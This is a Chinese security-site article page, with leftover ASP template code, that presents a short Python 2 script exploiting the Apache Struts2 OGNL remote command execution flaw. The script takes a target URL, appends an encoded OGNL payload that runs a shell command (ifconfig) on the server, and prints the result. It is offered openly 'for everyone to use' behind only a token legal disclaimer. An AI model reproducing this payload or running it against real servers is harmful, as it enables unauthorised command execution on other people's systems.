<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("Python,Struts2,漏洞,脚本") PageTitle=stripHTML("Python研究:Struts2漏洞利用脚本") ArticleIntro=stripHTML("今天安全圈都被Struts2命令执行漏洞所刷屏了,乌云里各种爆 ,看了一下利用代码,写出一个脚本给各位利用吧") Articlecontent=stripHTML("今天安全圈都被Struts2命令执行漏洞所刷屏了,乌云里各种爆 ,看了一下利用代码,写出一个脚本给各位利用吧:)  不得用于非法用途,否则自负import ur…") ModuleName = stripHTML("programme") InfoID = stripHTML("226252") ChannelShortName=stripHTML("编程") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("programme") %> Python研究:Struts2漏洞利用脚本 - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 编程 >> Python >> 正文

[组图]Python研究:Struts2漏洞利用脚本

2016/4/27 作者:沦沦 来源: 网络收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

  今天安全圈都被Struts2命令执行漏洞所刷屏了,乌云里各种爆 ,看了一下利用代码,写出一个脚本给各位利用吧:)

  不得用于非法用途,否则自负

import urllib

import sys


def gethtml(url):

page=urllib.urlopen(url)

html=page.read()

return html


def main():

s=raw_input("URL:")

htmlll=s+"?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=ifconfig&pp=\\A&ppp=%20&encoding=UTF-8"

htmll=gethtml(str(htmlll))

print htmll



if __name__=='__main__':

main()

         



  • 上一篇编程:

  • 下一篇编程: 没有了